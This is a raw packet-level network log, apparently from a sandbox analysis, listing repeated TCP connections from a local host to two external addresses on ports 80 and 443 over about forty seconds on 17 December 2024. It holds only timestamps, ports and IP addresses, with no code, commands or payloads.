                                                                                                                                  Dec 17, 2024 08:43:22.813795090 CET4977280192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:22.932805061 CET8049765158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:22.932882071 CET4976580192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:22.933612108 CET8049772158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:22.933681011 CET4977280192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:22.933883905 CET4977280192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:23.053592920 CET8049772158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:24.142376900 CET8049772158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:24.143563986 CET49778443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:24.143624067 CET44349778149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:24.143687963 CET49778443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:24.143964052 CET49778443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:24.143979073 CET44349778149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:24.196141005 CET4977280192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:25.515614033 CET44349778149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:25.524482965 CET49778443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:25.524522066 CET44349778149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:25.524596930 CET49778443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:25.524605036 CET44349778149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:26.189069986 CET44349778149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:26.189160109 CET44349778149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:26.189205885 CET49778443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:26.189671993 CET49778443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:26.192938089 CET4977280192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:26.194184065 CET4978380192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:26.312999010 CET8049772158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:26.313061953 CET4977280192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:26.313903093 CET8049783158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:26.313972950 CET4978380192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:26.314163923 CET4978380192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:26.433947086 CET8049783158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:27.522449970 CET8049783158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:27.525553942 CET49784443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:27.525652885 CET44349784149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:27.525768995 CET49784443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:27.526019096 CET49784443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:27.526048899 CET44349784149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:27.571290970 CET4978380192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:28.890923023 CET44349784149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:28.893968105 CET49784443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:28.893994093 CET44349784149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:28.894043922 CET49784443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:28.894054890 CET44349784149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:29.522211075 CET44349784149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:29.522473097 CET44349784149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:29.522535086 CET49784443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:29.522839069 CET49784443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:29.526262045 CET4978380192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:29.527450085 CET4979080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:29.646591902 CET8049783158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:29.647217989 CET8049790158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:29.647330046 CET4978380192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:29.647360086 CET4979080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:29.647578955 CET4979080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:29.767343998 CET8049790158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:30.855303049 CET8049790158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:30.856867075 CET49794443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:30.856914997 CET44349794149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:30.857006073 CET49794443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:30.857260942 CET49794443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:30.857271910 CET44349794149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:30.899262905 CET4979080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:32.346534967 CET44349794149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:32.348431110 CET49794443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:32.348511934 CET44349794149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:32.348604918 CET49794443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:32.348624945 CET44349794149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:32.963917971 CET44349794149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:32.964121103 CET44349794149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:32.964184999 CET49794443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:32.964510918 CET49794443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:32.968194008 CET4979080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:32.968978882 CET4980080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:33.088247061 CET8049790158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:33.088370085 CET4979080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:33.088663101 CET8049800158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:33.088735104 CET4980080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:33.088923931 CET4980080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:33.208637953 CET8049800158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:34.292960882 CET8049800158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:34.294383049 CET49805443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:34.294430971 CET44349805149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:34.294526100 CET49805443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:34.294789076 CET49805443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:34.294800997 CET44349805149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:34.336774111 CET4980080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:35.662969112 CET44349805149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:35.664815903 CET49805443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:35.664855003 CET44349805149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:35.664928913 CET49805443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:35.664937019 CET44349805149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:36.317049980 CET44349805149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:36.317136049 CET44349805149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:36.317200899 CET49805443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:36.317590952 CET49805443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:36.320411921 CET4980080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:36.321429014 CET4981080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:36.441143036 CET8049800158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:36.441278934 CET8049810158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:36.441281080 CET4980080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:36.441379070 CET4981080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:36.441560030 CET4981080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:36.561366081 CET8049810158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:37.644859076 CET8049810158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:37.646339893 CET49813443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:37.646389008 CET44349813149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:37.646610022 CET49813443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:37.647032022 CET49813443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:37.647044897 CET44349813149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:37.696127892 CET4981080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:39.009488106 CET44349813149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:39.011132002 CET49813443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:39.011142969 CET44349813149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:39.011179924 CET49813443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:39.011185884 CET44349813149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:39.650638103 CET44349813149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:39.650825024 CET44349813149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:39.650919914 CET49813443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:39.653136969 CET49813443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:39.655985117 CET4981080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:39.657088041 CET4981980192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:39.776324034 CET8049810158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:39.776469946 CET4981080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:39.776871920 CET8049819158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:39.776952982 CET4981980192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:39.777172089 CET4981980192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:39.896972895 CET8049819158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:40.981745958 CET8049819158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:40.983148098 CET49825443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:40.983197927 CET44349825149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:40.983321905 CET49825443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:40.983587027 CET49825443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:40.983597040 CET44349825149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:41.024307013 CET4981980192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:42.345652103 CET44349825149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:42.347275972 CET49825443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:42.347318888 CET44349825149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:42.347383976 CET49825443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:42.347389936 CET44349825149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:42.965125084 CET44349825149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:42.965209007 CET44349825149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:42.965305090 CET49825443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:42.965744972 CET49825443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:42.968694925 CET4981980192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:42.969727993 CET4983080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:43.088862896 CET8049819158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:43.089099884 CET4981980192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:43.089396954 CET8049830158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:43.089473963 CET4983080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:43.089665890 CET4983080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:43.211877108 CET8049830158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:44.294574976 CET8049830158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:44.295730114 CET49834443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:44.295782089 CET44349834149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:44.295869112 CET49834443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:44.296113968 CET49834443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:44.296128035 CET44349834149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:44.336783886 CET4983080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:45.656698942 CET44349834149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:45.658562899 CET49834443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:45.658584118 CET44349834149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:45.658663988 CET49834443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:45.658668995 CET44349834149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:46.291702032 CET44349834149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:46.291778088 CET44349834149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:46.291853905 CET49834443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:46.292346001 CET49834443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:46.295037031 CET4983080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:46.296190023 CET4983880192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:46.415395021 CET8049830158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:46.415510893 CET4983080192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:46.415924072 CET8049838158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:46.415992975 CET4983880192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:46.416150093 CET4983880192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:46.537045002 CET8049838158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:47.623064995 CET8049838158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:47.624264002 CET49844443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:47.624311924 CET44349844149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:47.624501944 CET49844443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:47.624656916 CET49844443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:47.624670029 CET44349844149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:47.664892912 CET4983880192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:48.985409021 CET44349844149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:48.987293959 CET49844443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:48.987356901 CET44349844149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:48.987458944 CET49844443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:48.987466097 CET44349844149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:49.603873968 CET44349844149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:49.603948116 CET44349844149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:49.604108095 CET49844443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:49.604670048 CET49844443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:49.608165026 CET4983880192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:49.609205008 CET4984980192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:49.728275061 CET8049838158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:49.728388071 CET4983880192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:49.728948116 CET8049849158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:49.729024887 CET4984980192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:49.729285002 CET4984980192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:49.848948956 CET8049849158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:50.932688951 CET8049849158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:50.934218884 CET49852443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:50.934266090 CET44349852149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:50.934369087 CET49852443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:50.934612989 CET49852443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:50.934628010 CET44349852149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:50.977456093 CET4984980192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:52.296857119 CET44349852149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:52.298650026 CET49852443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:52.298690081 CET44349852149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:52.298804998 CET49852443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:52.298810959 CET44349852149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:52.956474066 CET44349852149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:52.956653118 CET44349852149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:52.956706047 CET49852443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:52.956948996 CET49852443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:52.959930897 CET4984980192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:52.960971117 CET4985880192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:53.080055952 CET8049849158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:53.080146074 CET4984980192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:53.080764055 CET8049858158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:53.080841064 CET4985880192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:53.080987930 CET4985880192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:53.200861931 CET8049858158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:54.284662962 CET8049858158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:54.285785913 CET49861443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:54.285840988 CET44349861149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:54.286046982 CET49861443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:54.286341906 CET49861443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:54.286351919 CET44349861149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:54.336827040 CET4985880192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:55.651398897 CET44349861149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:55.653188944 CET49861443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:55.653204918 CET44349861149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:55.653270006 CET49861443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:55.653275967 CET44349861149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:56.280447006 CET44349861149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:56.280543089 CET44349861149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:56.280678034 CET49861443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:56.281105042 CET49861443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:56.284248114 CET4985880192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:56.285207987 CET4986780192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:56.404342890 CET8049858158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:56.404398918 CET4985880192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:56.405211926 CET8049867158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:56.405302048 CET4986780192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:56.405495882 CET4986780192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:56.525223970 CET8049867158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:57.631014109 CET8049867158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:57.642534971 CET49871443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:57.642632008 CET44349871149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:57.642715931 CET49871443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:57.642987013 CET49871443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:57.643017054 CET44349871149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:57.680531025 CET4986780192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:59.014338970 CET44349871149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:59.015968084 CET49871443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:59.015993118 CET44349871149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:59.016158104 CET49871443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:59.016168118 CET44349871149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:59.666034937 CET44349871149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:59.666117907 CET44349871149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:59.666218042 CET49871443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:59.666589022 CET49871443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:43:59.669213057 CET4986780192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:59.670185089 CET4987780192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:59.789422035 CET8049867158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:59.789549112 CET4986780192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:59.789911985 CET8049877158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:43:59.790019035 CET4987780192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:59.790177107 CET4987780192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:43:59.910013914 CET8049877158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:00.996728897 CET8049877158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:00.999722004 CET49880443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:00.999778032 CET44349880149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:00.999838114 CET49880443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:01.000087976 CET49880443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:01.000103951 CET44349880149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:01.040040016 CET4987780192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:02.361347914 CET44349880149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:02.385595083 CET49880443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:02.385615110 CET44349880149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:02.385754108 CET49880443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:02.385757923 CET44349880149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:02.995872021 CET44349880149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:02.996005058 CET44349880149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:02.996061087 CET49880443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:02.996699095 CET49880443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:03.000488997 CET4987780192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:03.001571894 CET4988680192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:03.120559931 CET8049877158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:03.120639086 CET4987780192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:03.121217966 CET8049886158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:03.121299028 CET4988680192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:03.121478081 CET4988680192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:03.241389990 CET8049886158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:04.325215101 CET8049886158.101.44.242192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:04.326775074 CET49890443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:04.326822996 CET44349890149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:04.328105927 CET49890443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:04.328494072 CET49890443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:04.328505993 CET44349890149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:04.368068933 CET4988680192.168.2.4158.101.44.242
                                                                                                                                  Dec 17, 2024 08:44:05.692289114 CET44349890149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:05.694427013 CET49890443192.168.2.4149.154.167.220
                                                                                                                                  Dec 17, 2024 08:44:05.694444895 CET44349890149.154.167.220192.168.2.4
                                                                                                                                  Dec 17, 2024 08:44:05.694519043 CET49890443192.168.2.4149.154.167.220
